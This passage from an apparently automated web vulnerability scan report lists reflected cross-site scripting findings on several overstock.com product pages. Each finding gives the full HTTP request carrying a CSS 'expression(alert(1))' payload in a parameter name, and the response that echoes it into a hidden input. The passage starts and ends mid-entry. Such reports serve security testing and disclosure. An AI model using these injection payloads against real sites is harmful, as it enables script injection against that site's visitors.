Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4099996|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:00 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408220410:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114472

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Pe
...[SNIP]...
<input type="hidden" name="b23c2"style="x:expression(alert(1))"428f9b27895" value="1"/>
...[SNIP]...

2.65. http://www.overstock.com/Clothing-Shoes/Peppers-Sportsman-Floating-Sandbar-Mens-Sunglasses/4099978/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Peppers-Sportsman-Floating-Sandbar-Mens-Sunglasses/4099978/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f20"style%3d"x%3aexpression(alert(1))"5a0146d5e47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5f20"style="x:expression(alert(1))"5a0146d5e47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Peppers-Sportsman-Floating-Sandbar-Mens-Sunglasses/4099978/product.html?e5f20"style%3d"x%3aexpression(alert(1))"5a0146d5e47=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:57 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:57 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4099978|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:57 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408217297:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:57 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=13
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110433

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Pe
...[SNIP]...
<input type="hidden" name="e5f20"style="x:expression(alert(1))"5a0146d5e47" value="1"/>
...[SNIP]...

2.66. http://www.overstock.com/Clothing-Shoes/Perry-Ellis-Mens-Sutton-Passcase-Wallet/4737065/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Perry-Ellis-Mens-Sutton-Passcase-Wallet/4737065/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5529"style%3d"x%3aexpression(alert(1))"6cf8dae6ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5529"style="x:expression(alert(1))"6cf8dae6ef3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Perry-Ellis-Mens-Sutton-Passcase-Wallet/4737065/product.html?b5529"style%3d"x%3aexpression(alert(1))"6cf8dae6ef3=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:03 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:03 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408223839:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4737065|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:03 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:03 GMT; Path=/
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 104805

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Pe
...[SNIP]...
<input type="hidden" name="b5529"style="x:expression(alert(1))"6cf8dae6ef3" value="1"/>
...[SNIP]...

2.67. http://www.overstock.com/Clothing-Shoes/Presa-Kennington-Oversized-Leather-Hobo-with-Shoulder-Strap/4109778/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Presa-Kennington-Oversized-Leather-Hobo-with-Shoulder-Strap/4109778/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 886f7"style%3d"x%3aexpression(alert(1))"42e768c8803 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 886f7"style="x:expression(alert(1))"42e768c8803 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Presa-Kennington-Oversized-Leather-Hobo-with-Shoulder-Strap/4109778/product.html?886f7"style%3d"x%3aexpression(alert(1))"42e768c8803=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:31 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:31 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4109778|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:31 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408191874:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:31 GMT; Path=/
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113549

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Pr
...[SNIP]...
<input type="hidden" name="886f7"style="x:expression(alert(1))"42e768c8803" value="1"/>
...[SNIP]...

2.68. http://www.overstock.com/Clothing-Shoes/Presa-Zuma-Large-Leather-Hobo-style-Bag/4124072/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Presa-Zuma-Large-Leather-Hobo-style-Bag/4124072/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 421c7"style%3d"x%3aexpression(alert(1))"493fc4af8a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 421c7"style="x:expression(alert(1))"493fc4af8a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Presa-Zuma-Large-Leather-Hobo-style-Bag/4124072/product.html?421c7"style%3d"x%3aexpression(alert(1))"493fc4af8a3=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:19 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:19 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408179095:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4124072|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:19 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:19 GMT; Path=/
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 118621

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Pr
...[SNIP]...
<input type="hidden" name="421c7"style="x:expression(alert(1))"493fc4af8a3" value="1"/>
...[SNIP]...

2.69. http://www.overstock.com/Clothing-Shoes/Rocket-Dog-Womens-Chestnut-Mid-calf-Boots/4469409/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Rocket-Dog-Womens-Chestnut-Mid-calf-Boots/4469409/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 179c0"style%3d"x%3aexpression(alert(1))"7a88e7a4193 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 179c0"style="x:expression(alert(1))"7a88e7a4193 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Rocket-Dog-Womens-Chestnut-Mid-calf-Boots/4469409/product.html?179c0"style%3d"x%3aexpression(alert(1))"7a88e7a4193=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:40 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:40 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:40 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4469409|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:40 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408260429:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 125402

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Ro
...[SNIP]...
<input type="hidden" name="179c0"style="x:expression(alert(1))"7a88e7a4193" value="1"/>
...[SNIP]...

2.70. http://www.overstock.com/Clothing-Shoes/Rothschild-Big-Girls-Wool-Walking-Coat-with-Matching-Hat/4745510/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Rothschild-Big-Girls-Wool-Walking-Coat-with-Matching-Hat/4745510/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 253bb"style%3d"x%3aexpression(alert(1))"2d7438fcdec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 253bb"style="x:expression(alert(1))"2d7438fcdec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Rothschild-Big-Girls-Wool-Walking-Coat-with-Matching-Hat/4745510/product.html?253bb"style%3d"x%3aexpression(alert(1))"2d7438fcdec=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:36 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:36 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408136880:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4745510|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:36 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:36 GMT; Path=/
Keep-Alive: timeout=5, max=24
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106152

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Ro
...[SNIP]...
<input type="hidden" name="253bb"style="x:expression(alert(1))"2d7438fcdec" value="1"/>
...[SNIP]...

2.71. http://www.overstock.com/Clothing-Shoes/Rothschild-Girls-Wool-Blend-Coat-and-Hat-Set/4745019/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Rothschild-Girls-Wool-Blend-Coat-and-Hat-Set/4745019/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41b46"style%3d"x%3aexpression(alert(1))"9675ca43ed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41b46"style="x:expression(alert(1))"9675ca43ed6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Rothschild-Girls-Wool-Blend-Coat-and-Hat-Set/4745019/product.html?41b46"style%3d"x%3aexpression(alert(1))"9675ca43ed6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:27 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:27 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408127359:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:27 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4745019|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:27 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111994

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Ro
...[SNIP]...
<input type="hidden" name="41b46"style="x:expression(alert(1))"9675ca43ed6" value="1"/>
...[SNIP]...

2.72. http://www.overstock.com/Clothing-Shoes/Ruby-Womens-Ruche-Dress/4662671/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
